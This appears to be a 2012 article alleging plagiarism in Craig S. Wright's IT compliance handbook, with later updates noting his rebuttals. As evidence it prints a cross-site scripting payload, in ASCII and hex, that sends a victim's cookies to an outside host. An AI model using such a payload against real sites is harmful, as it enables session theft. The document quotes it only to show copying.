Craig S. Wright - "The IT Regulatory and Standards Compliance Handbook" Contains Plagiarism

Sat Jan 7 19:25:05 CST 2012

[Update: Beginning on January 8, 2012, Craig Wright wrote an original rebuttal, a second follow-up a day after, and a third follow-up with additional information (We take some issue with the third, but will not get into it here). In it, he says that he did not properly cite some sources, but also gives additional details saying that some of the material was originally written by him, or as part of a group he was in. Mr. Wright indicates that some of this material, in its original form, is not available on Google, so we cannot verify it. It should be noted that Mr. Wright has spent a considerable amount of time researching each of the points outlined in this article, and determining what happened. This includes posting a sincere apology to the XSS FAQ author after mixing up who to obtain permission from. Many of the points Mr. Wright offers rebuttal to seem valid, that he was likely one of several contributors to work that eventually got used and re-used, and ultimately ended up in his book as well. We leave it up to the readers to determine the culpability of Mr. Wright in all of this.]

[Update: 4/21/2020 It has come to our attention that Mr. Wright has been accused of plagiarism several more times. You can read more about it in "Anatomy of a fraud - A deep dive into one of Craig Wright's plagiarized papers" written by Sam Williams in 2019.]

The book "The IT Regulatory and Standards Compliance Handbook: How to Survive an Information Systems Audit and Assessments" by Craig Steven Wright (published July 4, 2008), tech edited by Brian Freedman and Dale Liu, contains plagiarized material. While the quantity of stolen text does not comprise a majority of the book, there is enough to demonstrate systematic plagiarism, typically in the frequent bulleted lists throughout the book. The more interesting (and confusing) thing is that the author properly cites some sources, but not others. In fact, the level or lack of citation could lead one to think that three people contributed to the material. We know that Syngress has hired Technical Editors to provide content for books in the past (e.g., Dustin Fritz and "Dissecting the Hack 1st Edition"). This may be a case where the two technical editors provided material, a task that is not associated with the role of 'technical editor'.

As an example of the curious citations, page 7 has three external references: (Cohen, 1997), (Dijstra, 1976), and (Dodson, 2005). The last chapter of the book on Cyber Law not only has extensive footnotes, but they lead to 10 pages of footnotes citing sources. This is a drastically different method for citation and only appears in the single chapter. These three levels of citation (none, regular, footnotes) could easily be explained if the author and both technical editors contributed material.

The Plagiarism

The following table details the portions of the book that were taken from other sources, making up enough of the material to demonstrate the problem is systemic. In most cases, the plagiarized material is in the form of bulleted lists of points supporting the section. Most of the text spot-checked appeared to be original, with a couple exceptions. This suggests that the author(s) went through considerable effort to generate original content, but got lazy when providing supporting lists. In several cases, attempts were made to obscure the plagiarized content, one of which is included in the next paragraph. This shows willful infringement of copyright and inexcusable plagiarism. Only limited portions of the book were checked due to time constraints.

One of the most obvious places that demonstrate material was not only plagiarized, but the author attempted to hide the fact that the material was lifted, is in the section on cross-site scripting (XSS). On page 541, the second and third paragraph on XSS is almost verbatim from the well-known XSS FAQ. As you can see on the FAQ, the examples of cross-site scripting use "cgisecurity.com" as the domain name. When Wright took this material, he changed that domain to "microsoft.com". However, Wright changed the ASCII representation, but forgot to also change the HEX encoded version below it. This same mistake also appears on Wright's blog on XSS. From the book and blog:

NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.



"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'+document.cookie</script>

HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69

%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79

%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20

%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

If you take that HEX string and decode it, you get:

"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

Wright even includes a link to the XSS FAQ shortly after in the additional "References" section, but does not indicate his material was lifted from it.